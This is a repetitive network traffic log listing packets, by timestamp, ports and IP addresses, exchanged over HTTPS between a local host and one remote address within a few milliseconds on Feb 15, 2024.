Feb 15, 2024 19:42:27.211688995 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211708069 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211721897 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211765051 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211770058 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211796999 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211808920 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211822987 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211853981 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211859941 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211869955 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211872101 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211891890 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211920023 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211929083 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211939096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211944103 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211963892 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211997032 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212003946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212016106 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212019920 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212050915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212066889 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212073088 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212099075 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212107897 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212122917 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212152958 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212160110 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212174892 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212178946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212199926 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212229967 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212239981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212254047 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212258101 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212268114 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212300062 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212310076 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212322950 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212323904 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212344885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212372065 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212388992 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212399006 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212407112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212421894 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212449074 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212455988 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212471008 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212472916 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212501049 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212521076 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212529898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212539911 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212565899 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212568045 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212585926 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212610960 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212620974 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212635994 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212640047 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212658882 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212678909 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212686062 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212707043 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212712049 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212728024 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212759972 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212766886 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212779045 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212779999 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212800026 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212827921 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212835073 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212856054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212866068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212887049 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212918997 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212925911 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212937117 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212938070 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212960958 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.212985039 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.212994099 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213006020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213021040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213035107 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213071108 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213078022 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213090897 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213094950 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213112116 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213146925 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213152885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213166952 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213172913 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213184118 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213197947 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213205099 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213232040 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213236094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213257074 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213289976 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213295937 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213306904 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213316917 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213331938 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213365078 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213371992 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213382006 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213385105 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213403940 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213442087 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213449001 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213460922 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213463068 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213478088 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213507891 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213514090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213526964 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213530064 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213550091 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213583946 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213591099 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213603020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213603973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213622093 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213651896 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213658094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213671923 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213679075 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213697910 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213732004 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213738918 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213751078 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213754892 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213774920 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213804960 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213810921 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213824034 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213849068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213871002 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213912010 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213921070 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213932037 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213932037 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213948965 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.213972092 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.213979006 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214001894 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214009047 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214025974 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214060068 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214066029 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214076042 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214080095 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214097977 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214132071 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214138031 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214148998 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214149952 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214169979 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214205027 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214210987 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214221954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214222908 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214242935 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214276075 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214282990 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214293957 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214294910 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214317083 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214349031 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214354992 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214369059 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214379072 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214387894 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214421034 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214430094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214442968 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214447975 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214464903 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214494944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214502096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214514017 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214514017 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214533091 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214566946 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214575052 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214586020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214587927 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214610100 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214641094 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214648008 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214658976 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214667082 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214683056 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214714050 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214720011 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214734077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214740038 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214756966 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214783907 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214793921 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214806080 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214814901 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214833975 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214867115 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214873075 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214884996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214888096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214910030 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214931965 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214948893 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214965105 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.214968920 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.214983940 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215018034 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215023041 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215034962 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215037107 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215059042 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215090036 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215096951 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215109110 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215112925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215131044 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215163946 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215169907 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215181112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215181112 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215204954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215233088 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215240002 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215251923 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215256929 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215274096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215308905 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215315104 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215327978 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215328932 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215356112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215385914 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215392113 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215404987 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215411901 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215415001 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215429068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215452909 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215459108 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215478897 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215490103 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215512037 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215537071 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215547085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215560913 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215569019 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215584040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215611935 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215620995 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215631962 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215645075 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215665102 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215693951 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215704918 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215717077 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215724945 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215739965 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215771914 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215778112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215790033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215790987 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215814114 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215833902 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215840101 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215862036 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215869904 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215884924 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215918064 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215924025 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215938091 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215945959 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215958118 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.215981960 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.215987921 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216002941 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216011047 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216025114 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216062069 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216068029 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216078997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216079950 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216100931 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216137886 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216144085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216156006 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216156960 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216172934 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216207027 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216212988 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216223955 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216226101 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216248989 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216279984 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216286898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216296911 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216300964 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216319084 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216353893 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216360092 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216371059 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216372013 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216392040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216423988 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216429949 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216442108 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216442108 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216461897 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216500044 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216506958 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216519117 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216519117 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216542006 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216573000 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216579914 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216589928 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216594934 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216612101 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216644049 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216650009 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216661930 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216662884 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216685057 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216717005 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216722965 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216734886 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.216738939 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.216758013 CET	443	49722	172.67.215.45	192.168.2.6
